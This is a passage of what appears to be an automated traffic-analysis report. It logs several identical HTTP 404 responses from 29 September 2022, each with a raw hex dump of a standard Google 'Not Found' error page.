6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
